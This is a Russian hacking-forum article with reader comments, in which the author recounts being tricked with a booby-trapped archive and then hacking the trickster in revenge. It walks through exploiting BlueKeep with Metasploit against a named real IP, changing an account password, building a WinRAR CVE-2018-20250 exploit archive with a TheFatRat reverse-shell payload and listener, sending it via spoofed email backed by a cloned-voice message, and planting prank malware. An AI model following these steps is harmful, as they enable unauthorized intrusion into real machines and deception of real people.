• Познакомьтесь с пентестом веб-приложений на практике в нашем новом бесплатном курсе

    «Анализ защищенности веб-приложений»

    🔥 Записаться бесплатно!

  • CTF с учебными материалами Codeby Games

    Обучение кибербезопасности в игровой форме. Более 200 заданий по Active Directory, OSINT, PWN, Веб, Стеганографии, Реверс-инжинирингу, Форензике и Криптографии. Школа CTF с бесплатными курсами по всем категориям.

Статья По горячим следам: эпизод шесть или как я с костлявой поиграл - дырявый WinRar, BlueKeep, Fake Voice Multi-Tacotron и немного чертовщины: ÿ. & duevile

Пролог и его формальности

BQ8P.gif

Вот здравствуйте, нет, лучше будет написать привет, но это слишком неофициально и неуважительно. Ладно. Проще говоря, я забыл как можно нормально поздороваться, поэтому обойдемся такой вот тщетщиной. Сегодня на повестке дня у нас очередной выпуск из цикла "По горячим следам", здесь вот оставлю ссылки на предыдущие пять частей:


Я отчаянно пытался всё это время найти действительно годный способ обмана, дабы Вы смогли насладиться чем-то новым, а даже если не новым, то хотя бы в оригинальном исполнении злоумышленника и вот чего нарыл. Начало мы возьмем из предыстории, слушайте и приятного чтения Вам.

Поскольку в последнее время некие произведения японского творчества меня сильно увлекают, ловите оригинальное появление дисклеймера. Техника призыва! Дискл-е-е-ейме-е-е-ер!

Дисклеймер


На самом деле я против зла и то, что я покажу вам далее, может быть,
практически применено различного рода антагонистами. Сразу предупреждаю, что я, как автор этой писанины , снимаю с себя ответственность за то с каким умыслом будет использована эта информация дальше. Виноват только и только тот, кто применяет знания, но не тот, кто ими делится. Автор лишь преследует благие цели, используя способы и пути злоумышленников, раскрывает суть преступного механизма, открывая людям глаза, демонстрируя способы защиты, ведь лучший протект - это знания.

По горячим следам: эпизод шесть или как я взломал свою смерть - дырявый WinRar, BlueKeep, Fake Voice Multi-Tacotron и немного чертовщины

Итак, когда-то я запостил у себя во всех социальных сетях просьбу меня взломать, обмануть и так далее. Естественно, ни одного способа, который бы попал в статью среди всех предложенных вариантов не оказалось, до сегодня. По крайней мере, я считал всех своих знакомых криворукими бездарями, кстати я и сам не отличаюсь золотыми протезами вместо конечностей, но я хотя бы умею не уронить ложку, когда пытаюсь донести ту к рту, упустим это.

Значится история стартует от запуска безобидной КС 1.6, в которую я люблю поигрывать время от времени, админю значится себе спокойно, что-то пытаюсь показывать в игре и тут подключается рандомный человечек с ником “Твоя смерть”, ничего в этом такого. И вот заводит он со мной, спустя час игры , диалог, абсолютно безобидный.

Ремарочка, Смерть оказался очень даже хорошим социальным инженером и просто с эшелоном выдержки и воли в кармане.

Он добавляет меня в друзья в Стиме и на следующий день мы также пересекаемся в игре. И вот наша беседа переходит на личности, мы знакомимся, расспрашиваем друг друга, ну всё типично. Превосходный лжец, ибо в итоге оказалось, что ни единое его слово не является истиной, но об этом позже.
Screenshot_6.png


Тогда я ещё не подозревал, что добавил он меня лишь потому, что хотел мониторить мою активность в играх и подстраивать как-бы случайные встречи.

После оказалось, что он также является активным игроком того же сервера в SAMP, хотя эту игру я забросил, но зайти покататься уж соизволил. Тогда общались мы посредством печально известного Дискорда, в виду отсутствия игрового голосового.

Знакомство продолжалось, честно, я уж подумал, что действительно нашел человека, походящего по ходу мыслей и прошлому на себя, но он лишь подстраивался под собеседника и не более.

Кстати, куда ж без расспросов о железе, версии виндовса и так далее. Смекаете к чему это?

Прошло семь дней. Мы кое-как поддерживали общение, он умело играл свою роль. И тут я столкнулся с проблемой, уже не припомню какой, но времени на её немедленное решение у меня не было. Спросил я у Максима, кстати такое настоящее имя нашего злоумышленника, он сказал, что у него такая же беда и он попытается с ней разобраться, а я могу идти по своим делам.

Я так и поступил, по возвращению домой, он кидает мне ссылку на статью на популярном форуме и говорит, что файлик со статьи фиксит все ошибки, кстати, так-то оно и есть, только вот нюанс, с настоящего портала.

На то время я не заметил подмены сразу, ибо был заменен всего-лишь один непримечательный символ. Качаем, проводим распаковку архива, и вот наш .exe, исключительно на интуиции я зачем-то посмотрел свойства и увидел, что это SFX архив. В голове щелчок, и тут я осознаю всю картину, перехожу быстренько на тот самый портал, проверяю работоспособность других линков, да, они работают, но с переадресацией на оригинал, замечаю подмену символа в ссылке.
Screenshot_16.png


Класс, это черт возьми, гениально. Заливать сам SFX на Вирустотал смысла нет, но я это сделал, его процент обнаруживаемости - 0. А вот то, что находилось в нём - да. Это был больше фановый вирус, Вашему вниманию представляем ÿ.exe, да, он так и называется. Но ведь там могла быть какая-то полезная нагрузка.


Представим картину, что мы таки открыли этот архив и зловред был запущен, что будет происходить?

Мой ответ прост, какой-то лютый психоделический бред, а после вас ожидает игра в машинку на протяжении восьми часов, дабы сохранить файлы. Вообще этот вредонос был предназначен для Виндовс XP, но оказалось, что он был адаптирован Максимом под все версии, даже 10.1 (ага, я до сих пор отрицаю существования 11-ой). А на то, как же он сводит владельцев устройств с ума, поглядите видео.

Как с ним бороться? Да просто, достаточно лишь зайти в безопасный режим и удалить сие чудо из автозагрузки, а после сделать восстановление, используя рекавери точку, поэтому не советую отключать эту функцию.

После этого наш гений социальной инженерии не исчез, на моё удивление, а просто посмеялся, добавив, что таким способом обманул не одну сотню человек и обычно там не вирус-смешинка, а троян или кейллогер. А вот теперь мы улетаем в ЧС, получаем удаление со всех списков друзей и конец.

Конец истории, но не нашего противостояния, выведем же на чистую воду сие зло.

Но сперва разберемся, как же сделать такой архивчик, ладно, шучу. Все знают, как подобное сделать, ну не вижу смысла описывать подобное здесь.

Итак, поехали. Начнем, наверное, со сбора доступной информации, пытаемся выжать максимум из того, что было предоставлено самим Максимом. Первым делом Стим, познакомились ведь мы с ним сначала там.

Но я Вас разочарую, во-первых информации, помимо увлечений здесь нет, а во-вторых такие аккаунты купить очень легко. Идем дальше, Дискорд был удален, как и страница в ВК, поэтому сразу уймище зацепок мы потеряли. И тут ко мне пришла идея, которой бы выдать Оскар, Грэмми и премию Дарвина посмертно.

Он ведь заходил на сервер КС, а стало быть в истории подключений есть его айпи, звучало гениально, у меня есть доступ к файловой системе сервера, поэтому проблем не возникло. Мы получили его IP. Просто что-то слишком? Да, я также подумал, когда узнал, что это всего-то адрес ВПН-а, но тут же вспомнил, что на сервере САМП стоит фильтр подключений с VPN, а стало быть…

После связи со знакомыми администраторами и несколькими тысячами убытка, мы получаем заветные циферки - 193.105.201.59. Ну и быстрый анализ, не запуская Кали, ибо толку бы было не больше.

Теперь можем просканировать открытые порты и врубить ему стрессер! Шутка, это будет крайней мерой, но подобным заниматься я не очень и хочу.

Ой, то, что вы видите на скрине… Ну то не я, альтерэго взяло верх.
Screenshot_8.png


Итак, заводим нашу любимую Кали и начинаем действо. Сперва сканируем портики через zenmap:
Код:
zenmap

Результат очень удивил, ну о-о-чень. На него можете взглянуть на скрине собственно.
Screenshot_17.png


Единственный открытый порт - 3389, это очень занятно очень, ведь раньше я никогда не встречал “жертв” с подобным портом. Для начала давайте узнаем, что это за операционная система, очень простым путем:
Код:
rdesktop 193.105.201.59

Соглашаемся и видим окно авторизации родной семерочки версии R1. Сразу же у меня родилась идея попытаться воспользоваться один стареньким, но не очень, эксплоитом в метасплойте. Имя ему будет BlueKeep, я им пользовался в прошлом, когда мне нужны были виртуальные машины с чьим-то рабочим вмешательством.

Открываем метасплоит и ищем наш эксплоит:
Код:
msfconsole
search bluekeep

Screenshot_2021-12-20_05_52_46.png


Оказалось в этой уязвимости есть ещё и свой сканер, воспользуемся, кстати недавно узнал, что если производился поиск, то не обязательно копировать название эксплоита, достаточно лишь написать так:
Код:
use 0

Затем определим параметр, отвечающий за целевую машину, прежде просмотрев опции:
Код:
show options
set rhost 193.105.201.59
run

Вразумительного ответа, уязвима ли машина мы не получили кстати. Ну просканировало и всё, поэтому переходим к непостредственно эксплуатации, веря в чудо:
Код:
use 1
Screenshot_2021-12-20_05_57_19.png


Сперва выставим автоматическое определение целевой машины:
Код:
set target 0
set rhosts 193.105.201.59
exploit

Пользуясь случаем, добавлю, что полезная нагрузка нам подходит как нельзя кстати и заменять мы её не будет, но вы можете, используя :
Код:
Show payloads

И, на моё удивление, ловим сессию метерпретер, после переходим в шелл, отображаем пользователей и меняем пароль от учетки, всё как и в прошлой статье:
Код:
pwd
ls
getuid
shell
net user
net user YourDeath 1000minus7

Ну и теперь с помощью redesktop подключаемся:
Код:
redesktop  193.105.201.59

Единственное, что имеется на рабочем столе - это корзина и “Новый документ”, естественно я его открыл и чуть-чуть пришел в шок, ну вот правда.
Screenshot_10.png


То есть он намеренно направил нас по ложному следу, используя ВПН в КС, а там где запрещен последний, решил посидеть с выделенного сервера. Прикольно.

Выходит, что в итог мы лишены любой информации о нашем противнике, абсолютно любой. Такое произошло впервые за весь цикл наших писанин, но не беда, ведь мы ещё и неплохо умеем играть и устраивать спектакли. По мне плакал драмкружок. Кстати Стим-то он не сменил, видя где он играет, было легко пересечься с ним.

Ну и с этого момента начался длинный путь притворства и лжи от меня, делалось всё по тому же принципу, которым Максимка одурачил меня. Спустя три дня, я делаю ему вот такое предложение и скидываю ссылку на архив, а после каким-то магическим образом ловлю метерпретер на своей Кали. Как? А давайте поведаю.
Screenshot_11.png


Короче на второй день общения, достаточно искреннего, как мне показалось, я у него напролом спросил есть ли у него в папке с Винраром unacev2.dll, указав, что знакомый программист рекомендовал его просканировать на вирусы, ибо там могут быть какие-то зловреды. Мы с ним вместе посмеялись, но как я понял этот файлик у него имеется.

Поэтому работаем следующим образом, немного расскажу о CVE-2018-20250, которую мы сейчас используем. Это интересная уязвимость, которая в своё время была 0-day и до сих пор её толком не профиксили, точнее фикс то выпустили, но мало кто получил это обновление. А все ведь дело в том, что бесконечный пробный период имеет свои минусы, да, то самое отсутствие обновлений. :D

Для генерации нашего злого архива, мы будем использовать следующий репозиторий, который заблаговременно скопировали на Кали:
Код:
git clone https://github.com/DANIELVISPOBLOG/WinRar_ACE_exploit_CVE-2018-20250
cd Winrar…
python create_exploit.py

Прежде поместив в директорию со скриптом нужные файлы, а нужные файлы будут таковыми. Я не хотел морочить голову venom’ом, поэтому давайте воспользуемся старым скриптом для автоматизации его работы, всё равно, как уже я узнал он не пользуется антивирусным ПО.

Вот всё в одном коде:
Код:
git clone https://github.com/Screetsec/TheFatRat.git
cd TheFatRat
chmod +x setup.sh && ./setup.sh
FatRat

Ну и выберем единичку, а после запустим слушатель через метасплоит:
Код:
msfconsole
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.9.83
set LPORT 6666
 run

Так-с, а теперь давайте поведаю, как же я записал этому типу свой голос, но воспроизведенный программно. Дело всё в репозитории, который позволяет воспроизводить текст клонированным голосом, представляю Вашему вниманию - вот это чудо, главное ссылку не забыть вставить.
Screenshot_12.png


Но для его работы нужен 1 ТБ свободного места, такими ресурсами мы не располагаем, но благо имеется некая библиотека гугла, позволяющая запустить сие чудо на удаленной машине. Ничего не нужно писать самому, лишь пошагово понажимать на значок запуска да и всё. Кстати, то голосовое оставлю во вложениях, ссылался на врожденный дефект речи, если что, и Максимка поверил.

Возвращаемся к делу, теперь нам нужно создать левую почту и отправить себе же, но только на основную, письмо с паролями от якобы админки на сервере. Но с личной почты такого делать бы не хотелось, воспользуемся подменой, для этого подойдёт любой сервис.

Пишем что-то типа “Алексей, вот ваши пароли администратора” и прикрепляем архив, после уже со своей почты пересылаем нашему Максону, кстати заодно и его почту узнали, веселуха-а.

И самое смешное произошло тогда, когда он ничего не заметил. Хотя этот способ имеет явные недочеты, когда открываешь, а не быстро распаковываешь архив, то в нем находится ещё какой-то третий файл, это ведь подозрительно до мозга костей. Теперь осталось действительно просто терпеть, пока его компьютер не перезапустится, ибо эта уязвимость лишь распаковывает файл по нужному нам пути, а не запускает.

А вот дальше мой план дал очень большую трещину, я не подумал, что сразу не получу шелл, а придется ждать. Естественно никакой админки у меня не было, а в архиве были пустые текстовые файлы.

И чёрт, мне пришлось покупать админку на каком-то крупном проекте по Майнкрафту, чтобы потом просто отдать её и наша жертва не начала потрошить свой ноутбук на наличие постороннего софта.

Следующее утро, день возмездия. Перезапуск был успешно совершен и полезная нагрузка запущена, а в метасплоите… О, да! Мы видим оболочку метерпретер, приятно.
Screenshot_14.png


Как его можно наказать? Как и он хотел меня провести с y.exe, так и я захотел поприкалываться над ним и давайте загрузим ему на рабочий стол психодел-вирусняк duevile.exe, хотя он лишь визуальный, но ознакомиться с его действием можно, посмотрев видео ниже.


Опять переходим на шелл, прежде просмотрев, что у него на рабочем столе:
Код:
pwd
ls
getuid
shell

После переместим копированием наш вредонос, прежде заменив иконку, а оригинал на рабочем столе жертвы удалив:
Код:
rm CS:GO.lnk
cp /root/CS:GO.exe /C:\Users\YourDeath\Desktop\CSGO.exe

Ну и осталось позвать нашего другана сыграть в КСочку, да? Он сыграл, ещё как сыграл.
Последним моим сообщением для него было “А вот ты квест не прошел”. Символичная и чувственная история получилась, слегка драматичная. Мне понравилось.

Итоги

Ну вот и итоги, господа, статья подошла к концу. Знаете, с каждым разом, когда меня встречают такие вот личности, я успомняюсь в человечестве и задаюсь одним лишь вопросом. Хоть кто-то может быть честным, если даже я не могу быть честен с самим собой, как тогда быть прямодушным с другими? Но это уже плоды моих фантазий и биполярного расстройства, выводов в этом цикле особо то и нет, да и подытожить нечего. Не попадайтесь на крючки злотворцев, всем добра. А мне пора. До скорого.

А ой, забыл сказать, Максимка(YourDeath) оказался моим старым знакомым, который откликнулся на просьбу обмануть меня. Это уже выяснилось после написания статьи. :D

И ещё, сгенерированный голос можно послушать .
 
Последнее редактирование:

Дод

Green Team
19.06.2020
23
34
BIT
0
Ууу. Обожаю твои статьи ещё не читал, но чувствую жаришку. Первый автор на форуме для меня
 
  • Нравится
Реакции: DeathDay

Cryptocurrency

One Level
11.08.2021
5
10
BIT
0
Marilyn и Deathday, вы делаете этот портал лучшим , спасибо за труды и захватывающие статьи . Очень полезно почитать новичку , сначала я не понимал этого но сейчас это практическое применение очень пригодилось .

Истиный герой , не опустил руки , нашел и наказал , если бы мог поставил бы миллион лайков
 
09.11.2017
258
260
BIT
5
прикольно улыбнуло вся это чудо =)

только в перёд держи тему в своих руках все статьи не прочитал но потом прочитаю)Обещаю)
 
  • Нравится
Реакции: DeathDay

magicalner

Green Team
21.05.2019
28
4
BIT
6
Всем привет. А хотел узнать, просто когда ты узнал ip через SAMP "у меня просто мобильный инет и ip меняется каждый раз динамический, так вот и еще на одном ip в одно время не могут сидеть много людей? " как ты узнать какой именно чел нужен ?
 
  • Нравится
Реакции: DeathDay

zoneaza

One Level
29.11.2021
1
1
BIT
0
Всем привет. А хотел узнать, просто когда ты узнал ip через SAMP "у меня просто мобильный инет и ip меняется каждый раз динамический, так вот и еще на одном ip в одно время не могут сидеть много людей? " как ты узнать какой именно чел нужен ?
сам понял что спросил ?
 
  • Нравится
Реакции: DeathDay

DeathDay

Green Team
18.04.2019
149
1 095
BIT
0
Всем привет. А хотел узнать, просто когда ты узнал ip через SAMP "у меня просто мобильный инет и ip меняется каждый раз динамический, так вот и еще на одном ip в одно время не могут сидеть много людей? " как ты узнать какой именно чел нужен ?
Большинство ведь не с мобильного интернета сидят, а , допустим, с роутера, который имеет статический ИП и изменить его можно только через провайдера.

Такая фича присутствует только у мобильных провайдеров, после перезапуска передачи данных получаете новый ИП, но если Вы не перезагружаете их, то адрес будет доступен для всего-всего, как и обычный IP. ( Да, если спалить такой адрес, то вполне можно отхватить, как и с обычного).

Кстати одна из причин , почему я до сих пор не перешёл на полноценный интернет: или роутер, или кабель, ибо там динамический ИП стоит порядком неплохо. А тут можно не бояться и всем палить свой, гы. Плюс в том случае мы вообще имели дело с виртуальной машиной, как оказалось позже.

Надеюсь, объяснил всё. Если будут ещё вопросы, обращайтесь. Хорошего дня. :)
 
Последнее редактирование:
  • Нравится
Реакции: barTusieK
19.12.2021
8
8
BIT
0
Боже, это чудесно. Статьи очень впечатляют, спасибо за этот труд. (( я выполнил твою просьбу? хы. ))
 
  • Нравится
Реакции: DeathDay

magicalner

Green Team
21.05.2019
28
4
BIT
6
Большинство ведь не с мобильного интернета сидят, а , допустим, с роутера, который имеет статический ИП и изменить его можно только через провайдера.

Такая фича присутствует только у мобильных провайдеров, после перезапуска передачи данных получаете новый ИП, но если Вы не перезагружаете их, то адрес будет доступен для всего-всего, как и обычный IP. ( Да, если спалить такой адрес, то вполне можно отхватить, как и с обычного).

Кстати одна из причин , почему я до сих пор не перешёл на полноценный интернет: или роутер, или кабель, ибо там динамический ИП стоит порядком неплохо. А тут можно не бояться и всем палить свой, гы. Плюс в том случае мы вообще имели дело с виртуальной машиной, как оказалось позже.

Надеюсь, объяснил всё. Если будут ещё вопросы, обращайтесь. Хорошего дня. :)
спасибо за ответ.
 
  • Нравится
Реакции: DeathDay

AnMok

New member
02.10.2022
2
0
BIT
0
Такотрон на колабе получается щас не работает? Меня отправляет на модуль, который уже как выяснилось не имеет поддержки и удален, но где то на usa-форуме вычитал, что у ребят получилось запустить играя с версиями. Может кто в курсе?
 

Remir

Grey Team
05.11.2017
275
354
BIT
285
Отлично! И мудро. :)
Это из этой оперы?
 
Мы в соцсетях:

Обучение наступательной кибербезопасности в игровой форме. Начать игру!